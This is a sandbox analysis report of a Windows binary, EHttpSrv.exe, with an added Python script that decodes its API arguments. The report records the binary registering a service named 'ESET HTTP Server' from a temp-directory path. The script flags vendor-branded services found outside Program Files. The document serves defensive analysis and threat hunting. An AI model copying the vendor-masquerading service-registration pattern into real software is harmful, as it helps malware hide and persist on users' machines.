                                                                                                                • Snapshot File: hcaresult_6_2_400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy_s$CloseCommandCreateLineOpenServicewcsstr$FileHandleManagerModuleNameValue
                                                                                                                • String ID: -app$StartHttpServer$StopHttpServer$http_dll.dll
                                                                                                                • API String ID: 2068747329-304233262
                                                                                                                • Opcode ID: bfff211ea4cdc9cc23a97f7a1dfe9e4cd21386795f217708e710b657fbf56fc9
                                                                                                                • Instruction ID: e3be212c131674410c1c2ebee6bc56352eccad3693de89cbbe7196e95990011f
                                                                                                                • Opcode Fuzzy Hash: bfff211ea4cdc9cc23a97f7a1dfe9e4cd21386795f217708e710b657fbf56fc9
                                                                                                                • Instruction Fuzzy Hash: 02119E326022046BC700BFF66D4AE4B7B8C9A857627144837FD00F61E1EABDE614957D
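The APIs list above for sub_401580 records the persistence step of EHttpSrv.exe: OpenSCManagerW, CreateServiceW with service name EHttpSrv and display name "ESET HTTP Server", then a Description value and a Parameters key written under HKEY_LOCAL_MACHINE. The raw hex arguments in those entries are easier to reason about once decoded. The Python below is an added example, not part of the Joe Sandbox report and not code from the analysed sample: it parses lines in the report's own `Name.Module(args), ref: addr` format, names the numeric arguments (SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, SERVICE_DEMAND_START, HKEY_LOCAL_MACHINE, KEY_READ|KEY_WRITE, REG_SZ) and applies a simple hunt check to the resulting service record. The user-writable directory list and the vendor word list are the example's own assumptions; the sample lines are copied from this report and the image path from the EHttpSrv.exe process record as constructed test input.

```python
"""Added example; not part of the Joe Sandbox report or of the analysed sample.
Parses the report's own API-entry format, e.g.
  CreateServiceW.ADVAPI32(00000000,EHttpSrv,ESET HTTP Server,000F01FF,...), ref: 004015FB
decodes numeric arguments into Win32 constant names (documented values), and flags a
service whose binary sits in a user-writable directory under a security-vendor display
name. USER_WRITABLE and VENDOR_WORDS are this example's assumptions, not report content."""
import re
from dataclasses import dataclass

API_LINE = re.compile(r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")
SERVICE_TYPE = {0x1: "SERVICE_KERNEL_DRIVER", 0x2: "SERVICE_FILE_SYSTEM_DRIVER",
                0x10: "SERVICE_WIN32_OWN_PROCESS", 0x20: "SERVICE_WIN32_SHARE_PROCESS",
                0x100: "SERVICE_INTERACTIVE_PROCESS"}
START_TYPE = {0: "SERVICE_BOOT_START", 1: "SERVICE_SYSTEM_START", 2: "SERVICE_AUTO_START",
              3: "SERVICE_DEMAND_START", 4: "SERVICE_DISABLED"}
ERROR_CONTROL = {0: "SERVICE_ERROR_IGNORE", 1: "SERVICE_ERROR_NORMAL",
                 2: "SERVICE_ERROR_SEVERE", 3: "SERVICE_ERROR_CRITICAL"}
HKEY = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
        0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
REG_TYPE = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD", 7: "REG_MULTI_SZ"}
SERVICE_ALL_ACCESS, SC_MANAGER_ALL_ACCESS = 0xF01FF, 0xF003F
KEY_READ, KEY_WRITE = 0x20019, 0x20006


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int


def parse_api_line(line):
    """One report line -> ApiCall, or None when the line is not an API entry."""
    m = API_LINE.search(line)
    if not m:
        return None
    args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
    return ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16))


def as_int(arg):
    """Numeric arguments are printed as 8 hex digits; strings and '?' give None."""
    return int(arg, 16) if HEX8.match(arg) else None


def flag_names(value, table):
    names = [n for bit, n in table.items() if value & bit == bit]
    return names or [hex(value)]


def decode(call):
    """Name the arguments of the calls that make up the service-persistence sequence."""
    a = call.args
    if call.api == "OpenSCManagerW" and len(a) >= 3:
        acc = as_int(a[2])
        return {"api": call.api, "desired_access": "SC_MANAGER_ALL_ACCESS" if acc == SC_MANAGER_ALL_ACCESS else a[2]}
    if call.api == "CreateServiceW" and len(a) >= 7:
        acc = as_int(a[3])
        return {"api": call.api, "service_name": a[1], "display_name": a[2],
                "desired_access": "SERVICE_ALL_ACCESS" if acc == SERVICE_ALL_ACCESS else a[3],
                "service_type": flag_names(as_int(a[4]) or 0, SERVICE_TYPE),
                "start_type": START_TYPE.get(as_int(a[5]), a[5]),
                "error_control": ERROR_CONTROL.get(as_int(a[6]), a[6])}
    if call.api == "RegOpenKeyExW" and len(a) >= 4:
        sam = as_int(a[3]) or 0
        rights = [n for n, v in (("KEY_READ", KEY_READ), ("KEY_WRITE", KEY_WRITE)) if sam & v == v]
        return {"api": call.api, "root": HKEY.get(as_int(a[0]), a[0]), "sam_desired": rights or [hex(sam)]}
    if call.api == "RegSetValueExW" and len(a) >= 5:
        return {"api": call.api, "value_name": a[1], "type": REG_TYPE.get(as_int(a[3]), a[3]), "data": a[4]}
    return {"api": call.api, "args": a}


# Hunt heuristics: assumptions of this example, not something the report states.
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\users\\public\\", "\\programdata\\")
VENDOR_WORDS = ("eset", "kaspersky", "mcafee", "symantec", "norton", "bitdefender", "avast", "sophos")


def assess_service(display_name, image_path):
    """A vendor-branded service whose binary is not under Program Files is worth a look."""
    p, findings = image_path.lower(), []
    if any(d in p for d in USER_WRITABLE):
        findings.append("image path in user-writable directory")
    if any(v in display_name.lower() for v in VENDOR_WORDS) and "\\program files" not in p:
        findings.append("security-vendor display name but binary outside Program Files")
    return findings


def analyse(report_lines, image_path):
    """Decode one function's API entries and assess the service they register."""
    decoded = [decode(c) for c in map(parse_api_line, report_lines) if c]
    create = next((d for d in decoded if d["api"] == "CreateServiceW"), None)
    return {"calls": decoded, "findings": assess_service(create["display_name"], image_path) if create else []}


# Constructed input: the sub_401580 entries listed in this report and the image path
# from the EHttpSrv.exe process record, copied here as test data.
REPORT_LINES = [
    "Part of subcall function 00401580: GetModuleFileNameW.KERNEL32(00000000,?,00000104,76231D70), ref: 004015B6",
    "Part of subcall function 00401580: OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 004015C3",
    "Part of subcall function 00401580: CreateServiceW.ADVAPI32(00000000,EHttpSrv,ESET HTTP Server,000F01FF,"
    "00000010,00000003,00000001,?,00000000,00000000,00000000,?,00000000,6FB10C0A), ref: 004015FB",
    "Part of subcall function 00401580: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,0002001F,?), ref: 00401645",
    "Part of subcall function 00401580: RegSetValueExW.ADVAPI32(?,Description,00000000,00000001,ESET HTTP Server,?), ref: 0040167C",
]
IMAGE_PATH = "C:\\Users\\user\\AppData\\Local\\Temp\\EHttpSrv.exe"

if __name__ == "__main__":
    result = analyse(REPORT_LINES, IMAGE_PATH)
    for entry in result["calls"]:
        print(entry)
    print("findings:", result["findings"])
```

On a live host the same assess_service check can be fed from the ImagePath and DisplayName values under HKLM\SYSTEM\CurrentControlSet\Services instead of report lines; the decoded CreateServiceW arguments (an own-process, demand-start service requested with SERVICE_ALL_ACCESS) are what to compare against the installed service's configuration.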

                                                                                                                Control-flow Graph (interactive rendering omitted; legend: Executed / Not Executed)
                                                                                                                • Basic blocks 0x20403f12 to 0x20404575; API nodes: GlobalAlloc (0x20403f12), CreateFileW (0x20404166), GlobalAlloc, ReadFile, CloseHandle (0x204041b0), GlobalAlloc (0x20404317), LoadLibraryW (0x20404485); internal calls to 0x204045c6, 0x204045f6 and 0x20404626
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 20404190
                                                                                                                • GlobalAlloc.KERNELBASE(00000040,00000001), ref: 204041B6
                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 204041C5
                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 204041CD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$AllocCloseCreateGlobalHandleRead
                                                                                                                • String ID: ?$?$?$?$?
                                                                                                                • API String ID: 388571530-3425934482
                                                                                                                • Opcode ID: 67d4ce6f76d59dcfc2f5265d94f6543ac42eb0e7de045181e51dacb0bff6f7ca
                                                                                                                • Instruction ID: 1d9fecc048d5ebdea5e256a55a120de2506068c49cdc505e27952ee320c8127c
                                                                                                                • Opcode Fuzzy Hash: 67d4ce6f76d59dcfc2f5265d94f6543ac42eb0e7de045181e51dacb0bff6f7ca
                                                                                                                • Instruction Fuzzy Hash: 62A1AFB0608341ABD719CFA4C484B5ABBE2AFC5744F44CA7CF994A7342D778DA04CB52

                                                                                                                Control-flow Graph (interactive rendering omitted; legend: Executed / Not Executed)
                                                                                                                • Entered at 0x204044d0: VirtualProtect, call 0x20404626, VirtualProtect (0x204044d0 to 0x20404519), then the same 0x20403f12 to 0x20404575 blocks as the previous graph with API nodes GlobalAlloc, CreateFileW, ReadFile, CloseHandle and LoadLibraryW
                                                                                                                APIs
                                                                                                                • VirtualProtect.KERNELBASE(?,00000000,?,00000000), ref: 204044D9
                                                                                                                • VirtualProtect.KERNELBASE(?,00000000,?,?), ref: 204044F5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                • Opcode ID: b0b461f4361be4dee5a55f635670ca515baf644bca3db06e136deeb1515ee1e8
                                                                                                                • Instruction ID: 830f1ece4cab85104a5116d0d9e9e41a1ea74eebd5cf8276e133c103f1593903
                                                                                                                • Opcode Fuzzy Hash: b0b461f4361be4dee5a55f635670ca515baf644bca3db06e136deeb1515ee1e8
                                                                                                                • Instruction Fuzzy Hash: B4F01DB2508344AFD7019B88DD4186FFBE9FF88704F40482EF59482120E776D9248B92

Control-flow Graph
• Function at 20404010 (graph node list omitted; calls LoadLibraryW)
                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNELBASE(00000000), ref: 20404486
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: 5951aa6c9f8a438f153127fcd9a9f3ee10ee28293eb90f2eab6fdb5f8755e8f9
                                                                                                                • Instruction ID: c18f9c85a66ec3f790252471dd21006197b5acf5d9a27bf5ee6111b8c4cc0023
                                                                                                                • Opcode Fuzzy Hash: 5951aa6c9f8a438f153127fcd9a9f3ee10ee28293eb90f2eab6fdb5f8755e8f9
                                                                                                                • Instruction Fuzzy Hash: 874181B02043019FD718DF64C491B2AB7E6FFC8314F41893DEA8AA7391E778A905CB52

Control-flow Graph
• Function at 20404060 (graph node list omitted; calls LoadLibraryW)
                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNELBASE(00000000), ref: 20404486
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: ad88f8b07a3075c5fb51b8329be8ff086f78926237761a80a17b9aee6eef6861
                                                                                                                • Instruction ID: 0ee044101d6d02e9337f6b7c62f6bf65ce1bd520952ddccff6895c4f292aa369
                                                                                                                • Opcode Fuzzy Hash: ad88f8b07a3075c5fb51b8329be8ff086f78926237761a80a17b9aee6eef6861
                                                                                                                • Instruction Fuzzy Hash: E52137B01083019FD314CF24C885B2AB7F6BFC8324F45866CE689A7392E778A901CB52

Control-flow Graph
• Function at 20404410 (graph node list omitted; calls LoadLibraryW)
                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNELBASE(00000000), ref: 20404486
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: 28c0e0c1c0e0989bdf65198ffae234c81b4255d7b9b0891e5899f52016e814b7
                                                                                                                • Instruction ID: 97bcd7a7d3ee4d16da48454221c5b769e84301d7cc6fa58145fe6bcf158dcb16
                                                                                                                • Opcode Fuzzy Hash: 28c0e0c1c0e0989bdf65198ffae234c81b4255d7b9b0891e5899f52016e814b7
                                                                                                                • Instruction Fuzzy Hash: 6011A0B16053019FD354CF24C485F2AB3FABF98314F85C56CE589A7351E7B8A905CB52
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #4026$#896$#776$#899$#5869$#2311$#310#900MessageSend
                                                                                                                • String ID: $ - $ / $%d - %d$%s (%d)$ID: %X$xXH $xXH $xXH $xXH $xXH $xXH $xXH $xXH $xXH
                                                                                                                • API String ID: 37426512-947018009
                                                                                                                • Opcode ID: cabc2dbee85e4aba3fd63b2958040dc1ad44c8bd5ea43a03926384743e42d822
                                                                                                                • Instruction ID: a5ad9d8399a16f30ac34dc57339c248370c21395f96e8a4d18e51e0fa3845928
                                                                                                                • Opcode Fuzzy Hash: cabc2dbee85e4aba3fd63b2958040dc1ad44c8bd5ea43a03926384743e42d822
                                                                                                                • Instruction Fuzzy Hash: 46D26AB15087429FC314DF94CC94B9AB7E4FF98709F008D2DF58693291EB78A949CB92

Control-flow Graph
• Function at 20413950 (graph node list omitted; calls MFC80U ordinals #310, #776, #777, #896, #899, #900, #2311, #4026, #5869, plus _snwprintf_s and SendMessageW)
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #4026$#896$#900$#777$#5869#899$#310#776MessageSend$_snwprintf_s
                                                                                                                • String ID: $ - $ / $%d - %d; $%d.%d.%d.%d$%d; $%ls / %d;$xXH $xXH
                                                                                                                • API String ID: 2650775939-1412730413
                                                                                                                • Opcode ID: e3b0b1cbae6526f139b746ec2c712949ead39f22e1a82209597108467d04682c
                                                                                                                • Instruction ID: 169cefda1df22826ce657370b19dc22772120cb55ed47d989d93c792faa39f45
                                                                                                                • Opcode Fuzzy Hash: e3b0b1cbae6526f139b746ec2c712949ead39f22e1a82209597108467d04682c
                                                                                                                • Instruction Fuzzy Hash: 03926B721083419FC714DF94CC88B9EB7F5BB98709F40C92DF586972A1EB38A649CB52

Control-flow Graph
• Function at 204276c0 (graph node list omitted; calls MFC80U ordinals #4574, #2155, #310, #2310, #2311, #578, plus _snwprintf_s, SendMessageW and InvalidateRect)
                                                                                                                APIs
                                                                                                                • #4574.MFC80U(FEEA6C22), ref: 20427706
                                                                                                                • #2155.MFC80U(00000000,FEEA6C22), ref: 20427750
                                                                                                                • #2155.MFC80U(?,00000000,FEEA6C22), ref: 2042776C
                                                                                                                • #2155.MFC80U(?,00000000,FEEA6C22), ref: 204277AB
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 204277FF
                                                                                                                • #310.MFC80U(000001C4,000001C6,000001C3,000001C5,00000000,FEEA6C22), ref: 20427816
                                                                                                                • _snwprintf_s.MSVCR80 ref: 2042788E
                                                                                                                • #2310.MFC80U(?,000000F7,?), ref: 204278BA
                                                                                                                • SendMessageW.USER32(?,00000181,00000000,?), ref: 204278D5
                                                                                                                • SendMessageW.USER32(?,0000019A,00000000,00000000), ref: 204278E6
                                                                                                                • #2310.MFC80U(?,000000F8,?,?,?,?), ref: 20427958
                                                                                                                • SendMessageW.USER32(?,00000181,00000000,?), ref: 20427977
                                                                                                                • SendMessageW.USER32(?,0000019A,00000000,00000001), ref: 20427988
                                                                                                                • #2310.MFC80U(?,000000F9,?,?,?,?), ref: 204279F7
                                                                                                                • SendMessageW.USER32(?,00000181,00000000,?), ref: 20427A16
                                                                                                                • SendMessageW.USER32(?,0000019A,00000000,00000002), ref: 20427A27
                                                                                                                • #2310.MFC80U(00000000,000001AB,?,?,?), ref: 20427ACD
                                                                                                                • SendMessageW.USER32(?,00000181,00000000,?), ref: 20427AE8
                                                                                                                • SendMessageW.USER32(?,0000019A,00000000,00000003), ref: 20427AF9
                                                                                                                • #2310.MFC80U(?,000001B5,?,?,?,?), ref: 20427BEC
                                                                                                                • SendMessageW.USER32(?,00000181,00000000,?), ref: 20427C07
                                                                                                                • SendMessageW.USER32(?,0000019A,00000000,00000004), ref: 20427C18
                                                                                                                • #2311.MFC80U(?,2048A5C0,?), ref: 20427CAF
                                                                                                                • SendMessageW.USER32(?,00000181,00000000,?), ref: 20427D16
                                                                                                                • SendMessageW.USER32(?,0000019A,00000000,00000005), ref: 20427D27
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#2310$#2155$#2311#310#4574InvalidateRect_snwprintf_s
                                                                                                                • String ID: $%d.%d.%d.%d
                                                                                                                • API String ID: 3043057548-2915810652
                                                                                                                • Opcode ID: 6da49143dbddd625081548b6f17276a95ca0a4c8e12fae0d74d201b9092ad2c1
                                                                                                                • Instruction ID: 3481f979ec22c93b63359bec9ef62fccf64b0c2134cbc51f481e68d95ae59acf
                                                                                                                • Opcode Fuzzy Hash: 6da49143dbddd625081548b6f17276a95ca0a4c8e12fae0d74d201b9092ad2c1
                                                                                                                • Instruction Fuzzy Hash: 5F428A70208742AFD318CF64C895FAAB7E5BF88704F048A6DF59997391DB34E904CB92
                                                                                                                APIs
                                                                                                                  • Part of subcall function 20420040: #764.MFC80U(?,?,?,20462BF8,FEEA6C22,?,?,?,00000000,00000000,2047AC89,000000FF,20462A77,?,?,00000000), ref: 20420074
                                                                                                                  • Part of subcall function 2041B640: #764.MFC80U(?,?,?,20462C00,FEEA6C22,?,?,?,00000000,00000000,2047AC89,000000FF,20462A77,?,?,00000000), ref: 2041B674
                                                                                                                  • Part of subcall function 20412B10: #1176.MFC80U(FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000,2047AC89), ref: 20412B3D
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B64
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B74
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B84
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B94
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412BAD
                                                                                                                  • Part of subcall function 2040F390: #764.MFC80U(?,?,00000000,?,20462C12,00000000,FEEA6C22,?,?,?,00000000,00000000,2047AC89,000000FF,20462A77,?), ref: 2040F3AF
                                                                                                                  • Part of subcall function 2040F390: #764.MFC80U(?,00000000,?,20462C12,00000000,FEEA6C22,?,?,?,00000000,00000000,2047AC89,000000FF,20462A77,?), ref: 2040F3C7
                                                                                                                  • Part of subcall function 20412B10: #265.MFC80U(00000000,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412BF3
                                                                                                                  • Part of subcall function 20412B10: memset.MSVCR80 ref: 20412C00
                                                                                                                  • Part of subcall function 2040FCE0: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,00000000,2047F1AF,000000FF,20462C1C,00000000,FEEA6C22,?,?,?,00000000), ref: 2040FD2D
                                                                                                                  • Part of subcall function 2040FCE0: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,00000000,2047F1AF,000000FF,20462C1C,00000000,FEEA6C22,?,?,?,00000000), ref: 2040FD3D
                                                                                                                  • Part of subcall function 2040FCE0: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,00000000,2047F1AF,000000FF,20462C1C,00000000,FEEA6C22,?,?,?,00000000), ref: 2040FD51
                                                                                                                • #280.MFC80U(?,?,00000001,00000000,00000000), ref: 20462E3B
                                                                                                                  • Part of subcall function 20462BC0: #2461.MFC80U(00000000,FEEA6C22,?,?,?,00000000,00000000,2047AC89,000000FF,20462A77,?,?,00000000,?,?), ref: 20462C27
                                                                                                                  • Part of subcall function 20462BC0: #578.MFC80U ref: 20462C6E
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,00000001,00000000,00000000), ref: 20462F5E
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,00000001,00000000,00000000), ref: 20462F72
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,00000001,00000000,00000000), ref: 20462F86
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,00000001,00000000,00000000), ref: 20462F9A
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,?,00000001), ref: 20462FE8
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,?,00000001), ref: 20462FF9
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,?,00000001), ref: 2046300A
                                                                                                                  • Part of subcall function 20412B10: memset.MSVCR80 ref: 20412C7E
                                                                                                                  • Part of subcall function 2040FCE0: #265.MFC80U(?,FEEA6C22,?,?,00000000,00000000,00000000,2047F1AF,000000FF,20462C1C,00000000,FEEA6C22,?,?,?,00000000), ref: 2040FD8F
                                                                                                                  • Part of subcall function 2040FCE0: memset.MSVCR80 ref: 2040FD9C
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,?,00000001), ref: 2046301E
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,?,00000001), ref: 204630D6
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,?,00000001), ref: 204630E7
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,?,00000001), ref: 204630F8
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,?,00000001), ref: 20463109
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,?,00000001), ref: 20463122
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,?,00000001), ref: 20463133
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,?,00000001), ref: 20463144
                                                                                                                • #764.MFC80U(?,?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,?,00000001), ref: 20463155
                                                                                                                • #1176.MFC80U(?,?,00000001,00000000,00000000), ref: 2046321A
                                                                                                                • #620.MFC80U(?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,00000000,?,?), ref: 2046363C
                                                                                                                • #620.MFC80U(?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,00000000,?,?), ref: 20463650
                                                                                                                • #605.MFC80U(?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,00000000,?,?), ref: 20463663
                                                                                                                • #620.MFC80U(?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,00000000,?,?), ref: 204636E1
                                                                                                                • #620.MFC80U(?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,00000000,?,?), ref: 204636F5
                                                                                                                • #605.MFC80U(?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,00000000,?,?), ref: 20463708
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764$#620$memset$#1176#265#605$#2461#280#578
                                                                                                                • String ID:
                                                                                                                • API String ID: 3532419128-0
                                                                                                                • Opcode ID: f6923c6f791e5853eaf6ab76b2eefd295e5d6ffe9b49acd0faa6d025e7341149
                                                                                                                • Instruction ID: 960057be93a2f085ab90d871999a437e563e96a6fd75a6c40616e5d940da2715
                                                                                                                • Opcode Fuzzy Hash: f6923c6f791e5853eaf6ab76b2eefd295e5d6ffe9b49acd0faa6d025e7341149
